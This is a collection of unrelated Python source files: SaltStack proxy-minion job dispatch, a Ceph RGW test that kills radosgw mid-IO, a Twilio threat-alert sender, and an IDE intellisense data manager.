def target(cls, minion_instance, opts, data, connected):
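# Worker entry point: lazily build the ProxyMinion instance, load modules and the
# proxy module with the dunders injected, then dispatch to _thread_multi_return for
# a list/tuple of functions or _thread_return for a single function.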
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
salt.minion.get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
ProxyMinion._thread_multi_return(minion_instance, opts, data)
else:
ProxyMinion._thread_return(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
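# Executor resolution order: per-job data, then the minion's module_executors,
# then the opts default (falling back to 'direct_call').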
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = salt.minion.load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
def thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = salt.minion.load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def handle_payload(self, payload):
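# Only AES payloads whose publication matches this minion (see _target_load) are
# decoded and executed; everything else is dropped, optionally traced when
# zmq_filtering is enabled.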
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# When filtering is enabled, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
process.name = '{}-Job-{}'.format(process.name, data['jid'])
self.subprocess_list.add(process)
def target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
|
test_kill_rgw_process.py
|
import os
import sys
import threading
sys.path.append(os.path.abspath(os.path.join(__file__, "../../../..")))
import argparse
import v1.lib.s3.rgw as rgw
from .initialize import PrepNFSGanesha
import time
import v1.utils.log as log
from v1.lib.s3.rgw import ObjectOps, Authenticate
from v1.utils.test_desc import AddTestInfo
from v1.lib.nfs_ganesha.manage_data import BaseDir, SubdirAndObjects
from v1.lib.process_manage import Process
from v1.lib.io_info import AddIOInfo
def test(yaml_file_path):
ganesha_test_config = {'mount_point': 'ganesha-mount',
'rgw_user_info': yaml_file_path}
verification = {'bucket': False,
'key': False}
log.info('ganesha_test_config :%s\n' % ganesha_test_config)
io_config = {'base_dir_count': 2,
'sub_dir_count': 2,
'Files': {'files_in_dir': 2, 'size': 10}}
add_io_info = AddIOInfo()
add_io_info.initialize()
log.info('io_config: %s\n' % io_config)
log.info('initiating nfs ganesha')
nfs_ganesha = PrepNFSGanesha(mount_point=ganesha_test_config['mount_point'],
yaml_fname=ganesha_test_config['rgw_user_info'])
nfs_ganesha.initialize()
log.info('authenticating rgw user')
rgw_auth = Authenticate(user_id=nfs_ganesha.user_id,
access_key=nfs_ganesha.access_key,
secret_key=nfs_ganesha.secret_key)
auth = rgw_auth.do_auth()
log.info('begin IO')
bdir = BaseDir(int(io_config['base_dir_count']), rgw_auth.json_file_upload,
ganesha_test_config['mount_point'],
auth['conn'])
bdirs = bdir.create(uname=str(rgw_auth.user_id))
subdir = SubdirAndObjects(bdirs, io_config, rgw_auth.json_file_upload, auth['conn'])
sub_dir_creation = threading.Thread(target=subdir.create) # adding this to thread
sub_dir_creation.start()
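# Run the subdir/object creation in the background so the RGW process can be
# killed while IO is still in flight.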
# kill RGW process
log.info('killing rgw process')
p = Process(name='radosgw')
p.find()
if p.process is None:
log.info('process not running')
else:
log.info('killing the process')
p.process.kill()
sub_dir_creation.join()
log.info('verification starts')
time.sleep(15)
bstatus = bdir.verify_s3()
log.info('bucket verification complete')
kstatus = subdir.verify_s3()
log.info('key verification complete')
verification = {}
for bs in bstatus:
if not bs['exists']:
verification['bucket'] = False
break
else:
verification['bucket'] = True
for ks in kstatus:
if not ks['exists']:
verification['key'] = False
if ks['type'] == 'file':
if not ks['md5_matched']:
verification['key'] = False
break
if not ks['size_matched']:
verification['key'] = False
break
else:
verification['key'] = True
return verification
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='NFS Ganesha Automation')
test_info = AddTestInfo('nfs ganesha basic IO test and verification on rgw')
parser.add_argument('-c', dest="config",
help='RGW Test yaml configuration')
args = parser.parse_args()
yaml_file = args.config
verified = test(yaml_file_path=yaml_file)
log.info('verified status: %s' % verified)
if not verified['bucket'] or not verified['key']:
test_info.failed_status('test failed')
exit(1)
else:
test_info.success_status('bucket and keys consistency verified')
test_info.completed_info()
|
send.py
|
import twilio_mod.env as my_environ
from twilio.rest import Client
from twilio_mod.Threat import Threat
import twilio_mod.upload_file as my_uploader
import threading
class send:
def __init__(self):
self.account_sid = my_environ.env_keys['TWILIO_ACCOUNT_SID']
self.auth_token = my_environ.env_keys['TWILIO_AUTH_TOKEN']
self.sms_num = my_environ.env_keys['SMS_NUM']
self.whatspp_num = my_environ.env_keys['WHATSAPP_NUM']
self.client = Client(self.account_sid, self.auth_token)
self.can_send_message = True
def sendMessage(self,message_text: str):
message = self.client.messages.create(
body=message_text,
from_=self.sms_num,
to='+917373025959'
)
print(message.sid)
print("SMS alert sent")
def sendWhatsApp(self,message_text: str):
message = self.client.messages.create(
body=message_text,
from_=self.whatspp_num,
to='whatsapp:+917373025959'
)
print(message.sid)
print("Whatsapp sent")
def sendAlert(self, path: str, threat = Threat('None', 0)):
if threat.level > 0 and self.can_send_message:
print("Sending alert.....")
message_text = 'Threat Detected \nType: ' + threat.type
self.smsThread = threading.Thread(target=self.sendMessage, args=(message_text,), daemon=True)
self.smsThread.start()
self.whatsAppThread = threading.Thread(target=self.sendWhatsApp, args=(path, message_text), daemon=True)
self.whatsAppThread.start()
self.can_send_message = False
def sendWhatsApp(self, path: str, message_text: str):
result = my_uploader.upload_cimage(path, 'threat')
url = result.get('url')
path_dict = [url]
message = self.client.messages.create(
body=message_text,
media_url=path_dict,
from_=self.whatspp_num,
to='whatsapp:+917373025959'
)
print(message.sid)
print("Whatsapp Alert Sent")
|
intellisence.py
|
# -*- coding: utf-8 -*-
from noval import _,GetApp
import noval.util.appdirs as appdirs
import noval.python.interpreter.interpreter as pythoninterpreter
import noval.python.interpreter.interpretermanager as interpretermanager
import subprocess
import noval.util.apputils as apputils
from noval.util import singleton
import os
import threading
import time
from noval.python.parser import config
from noval.python.parser import builtinmodule
from noval.python.parser.utils import CmpMember,py_sorted,NeedRenewDatabase
import glob
import signal
from dummy.userdb import UserDataDb
import noval.util.utils as utils
import datetime
import copy
import noval.consts as consts
from moduleloader import *
class IntellisenceDataLoader(object):
def __init__(self,data_location,_builtin_data_location,manager):
self._data_location = data_location
self.__builtin_data_location = _builtin_data_location
self.module_dicts = {}
self.import_list = []
self._builtin_module = None
self._manager = manager
def LodBuiltInData(self,interpreter):
if interpreter.IsV2():
builtin_data_path = os.path.join(self.__builtin_data_location,"2")
else:
builtin_data_path = os.path.join(self.__builtin_data_location,"3")
utils.get_logger().debug('load builtin data path:%s',builtin_data_path)
if not os.path.exists(builtin_data_path) or NeedRenewDatabase(builtin_data_path,config.DATABASE_VERSION):
utils.get_logger().debug('builtin data path %s does not exist',builtin_data_path)
self.GenerateBuiltinData(interpreter,builtin_data_path)
self.LoadIntellisenceDirData(builtin_data_path)
def GenerateBuiltinData(self,interpreter,builtin_data_path):
script_path = os.path.join(utils.get_app_path(), "noval", "python","parser", "run_builtin.py")
cmd_list = [interpreter.Path,script_path,builtin_data_path, config.DATABASE_VERSION]
if apputils.is_windows():
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
else:
startupinfo = None
work_dir = os.path.join(utils.get_app_path(), "noval", "python","parser")
subprocess.Popen(cmd_list,startupinfo=startupinfo,cwd=work_dir)
def LoadIntellisenceDirData(self,data_path):
name_sets = set()
for filepath in glob.glob(os.path.join(data_path,"*" + config.MEMBERS_FILE_EXTENSION)):
filename = os.path.basename(filepath)
module_name = '.'.join(filename.split(".")[0:-1])
name_sets.add(module_name)
for name in name_sets:
d = dict(members=os.path.join(data_path,name +config.MEMBERS_FILE_EXTENSION),\
member_list=os.path.join(data_path,name +config.MEMBERLIST_FILE_EXTENSION))
self.module_dicts[name] = d
def Load(self,interpreter):
t = threading.Thread(target=self.LoadInterperterData,args=(interpreter,))
t.start()
def LoadInterperterData(self,interpreter):
utils.update_statusbar(_("Loading intellisence database"))
self.module_dicts.clear()
# copy the builtin list into import_list; otherwise loading the import list
# would mutate interpreter.Builtins
self.import_list = copy.copy(interpreter.Builtins)
root_path = os.path.join(self._data_location,str(interpreter.Id))
intellisence_data_path = os.path.join(root_path,interpreter.Version)
if not os.path.exists(intellisence_data_path):
utils.update_statusbar(_("Finish load Intellisence database"))
return
self.LoadIntellisenceDirData(intellisence_data_path)
self.LodBuiltInData(interpreter)
self.LoadImportList()
self.LoadBuiltinModule(interpreter)
utils.update_statusbar(_("Finish load Intellisence database"))
def LoadImportList(self):
for key in self.module_dicts.keys():
if key.find(".") == -1:
if key not in self.import_list:
self.import_list.append(key)
self.import_list = py_sorted(self.import_list,CmpMember)
@property
def ImportList(self):
return self.import_list
def LoadBuiltinModule(self,interpreter):
utils.get_logger().debug('current interpreter builtin module name is:%s',interpreter.BuiltinModuleName)
builtin_module_loader = self._manager.GetModule(interpreter.BuiltinModuleName)
if builtin_module_loader is None:
utils.get_logger().debug("could not find builtin module %s, builtin database is not success loaded",interpreter.BuiltinModuleName)
return
data = builtin_module_loader.LoadMembers()
self._builtin_module = builtinmodule.BuiltinModule(builtin_module_loader.Name)
self._builtin_module.load(data)
@property
def BuiltinModule(self):
return self._builtin_module
@singleton.Singleton
class IntellisenceManager(object):
def __init__(self):
self.data_root_path = os.path.join(appdirs.get_user_data_path(),"intellisence")
if apputils.is_windows():
self._builtin_data_path = os.path.join(self.data_root_path,"builtins")
else:
self._builtin_data_path = os.path.join(appdirs.get_app_path(), "noval", "data","intellisence","builtins")
self.module_dicts = {}
self._loader = IntellisenceDataLoader(self.data_root_path,self._builtin_data_path,self)
self._is_running = False
self._process_obj = None
self._is_stopped = False
self.unfinish_files = {}
def Stop(self):
self.WriteUnfinishFiles()
self._is_stopped = True
@property
def IsRunning(self):
return self._is_running
def GetInterpreterDatabasePath(self,interpreter):
return os.path.join(self.data_root_path,str(interpreter.Id))
def GetInterpreterIntellisenceDataPath(self,interpreter):
return os.path.join(self.GetInterpreterDatabasePath(interpreter),interpreter.Version)
def generate_intellisence_data(self,interpreter,progress_dlg = None,load_data_end=False):
if interpreter.IsBuiltIn:
return
sys_path_list = interpreter.SysPathList
script_path = os.path.join(utils.get_app_path(), "noval", "python","parser", "run.py")
database_version = config.DATABASE_VERSION
cmd_list = [interpreter.Path,script_path,self.GetInterpreterDatabasePath(interpreter),\
database_version,str(int(GetApp().GetDebug()))]
if apputils.is_windows():
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
else:
startupinfo = None
work_dir = os.path.join(utils.get_app_path(), "noval", "python","parser")
self._process_obj = subprocess.Popen(cmd_list,startupinfo=startupinfo,cwd=work_dir)
interpreter.Analysing = True
utils.update_statusbar(_("Updating interpreter %s intellisence database") % interpreter.Name)
self._is_running = interpreter.Analysing
# if the current interpreter is the one being analysed, load its data when the analysis finishes
if interpreter == interpretermanager.InterpreterManager().GetCurrentInterpreter():
load_data_end = True
self.Wait(interpreter,progress_dlg,load_data_end)
def Wait(self,interpreter,progress_dlg,load_data_end):
# run the wait loop as a daemon thread so the application does not hang on exit
t = threading.Thread(target=self.WaitProcessEnd,daemon=True,args=(interpreter,progress_dlg,load_data_end))
t.start()
def WaitProcessEnd(self,interpreter,progress_dlg,load_data_end):
self._process_obj.wait()
interpreter.Analysing = False
interpreter.IsAnalysed = True
self._is_running = interpreter.Analysing
if progress_dlg != None:
progress_dlg.KeepGoing = False
progress_dlg.destroy()
if load_data_end and not self._is_stopped:
self.load_intellisence_data(interpreter)
if not self._is_stopped:
utils.update_statusbar(_("Intellisence database has been updated"))
else:
utils.get_logger().warn("smart intellisence analyse has been stopped by user")
def GetLastUpdateTime(self,database_location):
with open(os.path.join(database_location,config.UPDATE_FILE)) as f:
return f.read()
def AsyncShareUserData(self):
t = threading.Thread(target=self.ShareUserData)
t.start()
def ShareUserData(self):
if GetApp().GetDebug():
return
UserDataDb().ShareUserData()
UserDataDb().RecordStart()
def IsInterpreterNeedUpdateDatabase(self,interpreter):
update_interval_option = utils.profile_get_int("DatabaseUpdateInterval",consts.UPDATE_ONCE_STARTUP)
if update_interval_option == consts.UPDATE_ONCE_STARTUP:
return True
try:
# if the last update time cannot be found, force a database update
intellisence_data_path = self.GetInterpreterIntellisenceDataPath(interpreter)
last_update_time = self.GetLastUpdateTime(intellisence_data_path)
last_datetime = datetime.datetime.strptime(last_update_time, config.ISO_8601_DATETIME_FORMAT)
except:
utils.get_logger().exception('')
return True
now_datetime = datetime.datetime.now()
if update_interval_option == consts.UPDATE_ONCE_DAY:
return now_datetime > last_datetime + datetime.timedelta(hours=24)
elif update_interval_option == consts.UPDATE_ONCE_WEEK:
return now_datetime > last_datetime + datetime.timedelta(days=7)
elif update_interval_option == consts.UPDATE_ONCE_MONTH:
return now_datetime > last_datetime + datetime.timedelta(days=30)
elif update_interval_option == consts.NEVER_UPDATE_ONCE:
return False
def generate_default_intellisence_data(self):
current_interpreter = interpretermanager.InterpreterManager().GetCurrentInterpreter()
if current_interpreter is None:
return
self.AsyncShareUserData()
if not self.IsInterpreterNeedUpdateDatabase(current_interpreter):
utils.get_logger().info("interpreter %s is no need to update database" % current_interpreter.Name)
self.load_intellisence_data(current_interpreter)
return
utils.get_logger().info("interpreter %s is need to update database" % current_interpreter.Name)
try:
self.generate_intellisence_data(current_interpreter,load_data_end=True)
except Exception as e:
utils.get_logger().error('load interpreter name %s path %s version %s intellisence data path %s error: %s',current_interpreter.Name,\
current_interpreter.Path,current_interpreter.Version,\
os.path.join(self.data_root_path,str(current_interpreter.Id)),e)
utils.get_logger().exception("")
def load_intellisence_data(self,interpreter):
self._loader.Load(interpreter)
def GetImportList(self):
#list of import modules loaded globally
import_list = self._loader.ImportList
current_project = GetApp().MainFrame.GetProjectView(False).GetCurrentProject()
if current_project is not None:
#list of import modules from the current project
try:
l = copy.copy(current_project.db_loader.import_list)
l.extend(import_list)
import_list = l
except:
pass
return import_list
def GetBuiltinMemberList(self,name):
if self._loader.BuiltinModule is None:
return False,[]
return self._loader.BuiltinModule.GetBuiltInTypeMembers(name)
def GetMemberList(self,name):
names = name.split(".")
name_count = len(names)
i = 1
module_name = ""
while i <= name_count:
fit_name = ".".join(names[:i])
if self.HasModule(fit_name):
module_name = fit_name
else:
break
i += 1
if not self.HasModule(module_name):
return []
module = self.GetModule(module_name)
child_names = names[i:]
return module.GetMembers(child_names)
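# Illustrative example (not part of the original code) of the longest-prefix
# matching performed by GetMemberList: for name "os.path.join" the loop keeps
# extending the candidate while HasModule() succeeds, so
#   names        = ["os", "path", "join"]
#   module_name  = "os.path"      # longest registered module prefix
#   child_names  = ["join"]       # resolved inside that module via GetMembers()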
def GetBuiltinModule(self):
return self._loader.BuiltinModule
def GetTypeObjectMembers(self,obj_type):
if self._loader.BuiltinModule is None or obj_type == config.ASSIGN_TYPE_UNKNOWN:
return []
type_obj = self._loader.BuiltinModule.GetTypeNode(obj_type)
return type_obj.GetMemberList()
def GetModule(self,name):
d = self.GetModules()
if name in d:
return ModuleLoader(name,d[name][ModuleLoader.MEMBERS_KEY],d[name][ModuleLoader.MEMBER_LIST_KEY],self)
return None
def HasModule(self,name):
return name in self.GetModules()
def GetModules(self):
#all modules are the current project's modules plus the global modules
current_project = GetApp().MainFrame.GetProjectView(False).GetCurrentProject()
if current_project is None:
return self._loader.module_dicts
try:
d = copy.copy(self._loader.module_dicts)
d.update(current_project.db_loader.module_dicts)
return d
except:
return self._loader.module_dicts
def GetModuleMembers(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return []
return module.GetMembersWithName(child_name)
def GetModuleMember(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return []
return module.FindDefinitionWithName(child_name)
def GetBuiltinModuleMembers(self):
if self.GetBuiltinModule() is None:
return []
utils.get_logger().debug('builtin module name is: %s',self.GetBuiltinModule().Name)
return self.GetModuleMembers(self.GetBuiltinModule().Name,"")
